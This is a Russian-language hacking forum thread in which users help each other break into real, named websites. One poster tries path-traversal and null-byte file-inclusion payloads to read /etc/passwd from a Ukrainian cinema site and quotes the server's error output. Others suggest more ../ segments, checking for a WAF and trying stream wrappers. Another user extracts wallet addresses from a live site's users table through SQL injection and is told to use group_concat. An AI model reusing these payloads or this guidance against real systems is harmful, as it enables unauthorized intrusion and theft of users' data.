 |
|
20.03.2015, 22:27
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от teh
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
подставляю %00 и получаю
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
можно что нибудь сделать или уже ничего не вытащить?
incorrect_path/../../etc/passwd%00
|
|
|
20.03.2015, 22:54
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Сообщение от BigBear
incorrect_path/../../etc/passwd%00
это нужно подставить?
когда подставляю получаю
Warning: include(): Failed opening '../kinonetwork/incorrect_path/../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
|
|
|
|
20.03.2015, 23:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Ты уже рядом. Надо больше ../
Ищи, пробуй.
|
|
|
|
20.03.2015, 23:39
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Сообщение от BigBear
Ты уже рядом. Надо больше ../
Ищи, пробуй.
дошел до 20 и думаю, дальше ничего не будет. Значить, уже ничего не сделаешь?
|
|
|
|
20.03.2015, 23:46
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от teh
дошел до 20 и думаю, дальше ничего не будет. Значить, уже ничего не сделаешь?
Разложи карты ТАРО, они подскажут тебе верное направление или внимательней перечитай мануалы, может повезет, поймешь более правильный вектор, каждый случай индивидуальный и требует индивидуального рассмотрение на примере...
|
|
|
|
21.03.2015, 03:05
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Помогите, пожалуйста немогу найти инклуд
kinopalace.lviv.ua/kinonetwork/?id=../
|
|
|
|
21.03.2015, 11:40
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
|
|
|
|
21.03.2015, 11:50
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от madam
что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
через group_concat выводите
|
|
|
|
21.03.2015, 12:04
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
через group_concat выводите
спасибо
|
|
|
|
21.03.2015, 12:36
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от teh
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
подставляю %00 и получаю
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
можно что нибудь сделать или уже ничего не вытащить?
На подставление нулл-байта и изменении количества ../ поиск не ограничивается. Проанализируйте, есть ли есть waf на сайте, какие настройки и версия php используется( возможно ли использовании include в конструкции if, нормализация, усечение пути, стрим врапперы etc).
По Вашим постам заметно, что используете самое малое количество методов, не пытаетесь разобраться во многом.
Манов на форуме достаточно!
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
|
|
|
|
Похожие темы
Линейный вид
